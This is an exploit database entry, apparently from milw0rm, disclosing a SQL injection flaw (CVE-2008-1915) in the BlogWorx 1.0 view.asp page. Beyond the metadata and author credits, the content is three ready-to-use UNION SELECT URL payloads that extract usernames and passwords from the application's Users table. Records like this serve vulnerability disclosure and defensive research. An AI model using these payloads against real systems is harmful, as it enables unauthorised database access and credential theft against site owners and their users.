[] NeoSense

BlogWorx 1.0 - 'id' SQL Injection

Author: U238
type: webapps
platform: php
port: 
date_added: 2008-04-20 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-44531;CVE-2008-1915 
tags: 
aliases:  
screenshot_url:  
application_url: 

BlogWorx 'view.asp'  Multiple SQL Injection Vulnerability

Discovered By : U238

WebPage         : http://noexec.blogspot.com

mail                  : setuid.noexec0x1[a.q]hotmail[d0t].com


Script               : http://devworx.somee.com/projects/project.asp?pid=20

Script (alternativ)   : http://www.codedworld.com/download/blogworx/74764.html

Exploits   >>

http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users

: The_BekiR  - fahn - ka0x - xarnux - Ruslan - Tevfik Cevik - Ferruh Mavituna - nettoxic  - sersak :

# milw0rm.com [2008-04-21]